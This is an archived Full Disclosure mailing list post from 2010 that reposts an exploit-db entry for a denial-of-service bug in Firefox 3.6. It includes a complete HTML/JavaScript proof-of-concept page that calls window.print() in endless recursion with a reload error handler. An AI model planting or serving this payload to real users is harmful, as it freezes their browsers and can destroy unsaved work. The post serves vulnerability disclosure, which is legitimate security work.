Full Disclosure mailing list archives
Mozilla Firefox 3.6 (Multitudinous looping )Denial of Service Exploit
From: information security <informationhacker08 () gmail com>
Date: Sun, 14 Feb 2010 08:46:30 +0530
http://www.exploit-db.com/exploits/11432 # Title: Mozilla Firefox 3.6 (Multitudinous looping )Denial of Service Exploit # EDB-ID: 11432 # CVE-ID: () # OSVDB-ID: () # Author: Asheesh kumar Mani Tripathi # Published: 2010-02-13 # Verified: yes # Download Exploit Code <http://www.exploit-db.com/download/11432> # Download N/A view source <http://www.exploit-db.com/exploits/11432#viewSource> print <http://www.exploit-db.com/exploits/11432#printSource>?<http://www.exploit-db.com/exploits/11432#about> ======================================================================= Mozilla Firefox 3.6 (Multitudinous looping )Denial of Service Exploit ======================================================================= by Asheesh Kumar Mani Tripathi # code by Asheesh kumar Mani Tripathi # email informationhacker08 () gmail com # company aksitservices # Credit by Asheesh Anaconda #Download www.mozilla.com/firefox #Background Mozilla Firefox is a popular internet browser. .....:) #Vulnerability This bug is a typical result of multitudinous loop. The flaw exists when the attacker put window.printer() funtion in multitudinous loop.User interaction is required to exploit this vulnerability in that the target must visit a malicious web page. #Impact Browser doesn't respond any longer to any user input, all tabs are no longer accessible, your work if any might be lost. #Proof of concept copy the code in text file and save as "asheesh.html" open in Mozilla Firefox ======================================================================================================================== asheesh.html ======================================================================================================================== <html> <title>asheesh kumar mani tripathi</title> <script> function asheesh() { window.onerror=new Function("history.go(0)"); window.print(); asheesh(); } asheesh(); </script> </html> ======================================================================================================================== #If you have any questions, comments, or concerns, feel free to contact me.
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Mozilla Firefox 3.6 (Multitudinous looping )Denial of Service Exploit information security (Feb 13)